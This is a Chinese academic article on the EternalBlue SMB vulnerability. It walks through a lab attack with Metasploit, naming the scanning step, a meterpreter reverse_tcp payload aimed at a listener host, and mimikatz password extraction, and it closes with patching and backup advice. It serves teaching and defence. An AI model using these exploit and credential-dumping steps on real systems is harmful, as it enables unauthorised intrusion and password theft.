魯先志 柏海龍 董文豪

【摘要】本文分析了永恒之藍漏洞的原理，利用Metaploit工具演示了永恒之藍漏洞利用的過程，并介紹了防范該漏洞的方法，進一步加強計算機系統(tǒng)安全防護。

【關鍵詞】永恒之藍;漏洞;滲透測試

永恒之藍工具的泄露是重大網(wǎng)絡安全事件之一，這對全球的網(wǎng)絡安全工作造成了深遠意義的影響。永恒之藍（Eternal Blue）爆發(fā)于2017年，是一種利用Windows系統(tǒng)的SMB協(xié)議漏洞來獲取系統(tǒng)的最高權限，以此來控制被入侵的計算機。wannacry勒索病毒就是利用永恒之藍漏洞對受害者的電腦發(fā)起攻擊，并以“病毒”傳播的方式感染了全球部分windows操作系統(tǒng)的，這些安全事件給全球的相關公司和個人造成了重大的經(jīng)濟損失，給網(wǎng)絡安全行業(yè)提出了嚴峻的挑戰(zhàn)。

1. 什么是永恒之藍漏洞

永恒之藍是美國國家安全局開發(fā)的漏洞利用程序，于2017年4月14日被黑客組織影子掮客泄漏。永恒之藍利用微軟操作系統(tǒng)的445/TCP端口的文件分享協(xié)議漏洞進行攻擊的。微軟于2017年3月14日已經(jīng)發(fā)布過Microsoft Windows補丁修補了這個漏洞，由于很多用戶沒有及時修補該漏洞， WannaCry勒索病毒還利用這個漏洞在全球范圍內(nèi)大規(guī)模傳播。永恒之藍適用于網(wǎng)絡環(huán)境傳播， 傳播能力強、爆發(fā)速度快。當某臺電腦被感染后，該臺電腦會被病毒控制成為肉機，向網(wǎng)絡中的其他電腦傳播，這種超強的自主傳播能力，能夠在數(shù)小時內(nèi)感染一個系統(tǒng)內(nèi)的全部電腦。并且無需用戶任何操作。

2. 永恒之藍利用實踐

本次實驗主要是利用目標機器windows7操作系統(tǒng)上存在的永恒之藍漏洞，通過Metaploit工具對目標機進行滲透測試。永恒之藍是在Windows的SMB服務處理SMB請求時存在安全漏洞，這個漏洞的會被惡意利用并獲得到目標服務器的管理員權限。存在永恒之藍漏洞的電腦會開放445文件共享端口，惡意滲透者不需要誘騙用戶進行任何操作，只要開機系統(tǒng)開機并連接網(wǎng)絡，惡意攻擊者就能通過網(wǎng)絡在目標主機勒索軟件、遠程控制木馬、虛擬貨幣挖礦機等惡意程序。

2.1 利用Metaploit工具掃描存在永恒之藍利用漏洞的主機

打開Metasploit，使用命令搜索永恒之藍模塊search ms17，然后使用永恒之藍掃描模塊對目標網(wǎng)段進行漏洞掃描。

配置完成后，開始執(zhí)行Metasploit 的掃描模塊（run或exploit均可），數(shù)分鐘后發(fā)現(xiàn)網(wǎng)絡中一臺可能存在永恒之藍利用漏洞的主機。

2.2 使用永恒之藍攻擊模塊對目標主機進行攻擊

加載永恒之藍攻擊模塊，完成后加載攻擊載荷payload，首先利用show payloads命令查看set payload windows/x64/meterpreter/reverse_tcp。由于目標機為windows64位主機，所以用到的payload為windows x64。

設置目標主機set rhost 192.168.1.199設置payload監(jiān)聽主機（這里為本機）set lhost 192.168.1.127確認無誤后，開始執(zhí)行攻擊程序。如圖所示，攻擊成功目標主機成功上線。

2.3 使用Metasploit工具對目標主機進行后滲透操作

使用getuid查看目前主機操作系統(tǒng)中所有的用戶。

2.4 破解用戶的登錄密碼

獲得系統(tǒng)的系統(tǒng)管理員權限后，就可以利用mimikatz工具通過讀取操作系統(tǒng)的內(nèi)存信息來破解系統(tǒng)的管理員用戶登錄密碼。使用命令load mimikatz 命令加載mimikatz組件，命令載入成功后使用kerberos命令破解用戶的登錄密碼。

至此，一個完整的利用永恒之藍漏洞對目標主機進行滲透攻擊的案例演示完成。

3. 如何防范永恒之藍攻擊

3.1 及時更新操作系統(tǒng)，安裝操作系統(tǒng)補丁。

由于永恒之藍漏洞是操作系統(tǒng)本身的一個軟件缺陷，防范該漏洞的最好方法是在被惡意攻擊之前及時修補該漏洞。微軟公司會及時發(fā)現(xiàn)操作系統(tǒng)的漏洞并在官方網(wǎng)站發(fā)布漏洞的補丁。用戶需要及時關注微軟官方的漏洞補丁發(fā)布信息，及時對自己操作系統(tǒng)的漏洞打補丁。

3.2 對自己重要的文件和系統(tǒng)配置做好備份

目前的網(wǎng)絡環(huán)境下惡意攻擊系統(tǒng)的目的大部分是要獲取經(jīng)濟利益，編寫病毒，利用用戶操作系統(tǒng)的漏洞進行傳播，病毒進入系統(tǒng)的電腦內(nèi)會加密用戶電腦的數(shù)據(jù)文件和系統(tǒng)的關鍵配置文件，讓用戶無法正常工作。用戶平時及時做好數(shù)據(jù)備份工作，當受到病毒攻擊時，能及時將自己被破壞的數(shù)據(jù)恢復，讓攻擊者的影響降到到最小，這種也是一個很好的防御病毒的方式。

參考文獻：

[1]https：//zh.wikipedia.org/zhhans/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D

[2]陳興躍.網(wǎng)絡安全能力建設：意識、管理和技術的協(xié)同[J]信息安全研究.2017（08），765-768

[3]苗松娟等.由永恒之藍談網(wǎng)絡安全[J].電腦知識與技術.2017（13），52-54

[4]張德政，王娜娜等.永恒之藍變種挖礦蠕蟲WannaMine的安全技術防護研究[J]信息安全研究.2019（02），135-144

作者簡介：魯先志，河南濮陽人，碩士，副教授，專業(yè)：計算機軟件與理論;主要研究方向為職業(yè)教育和網(wǎng)絡安全。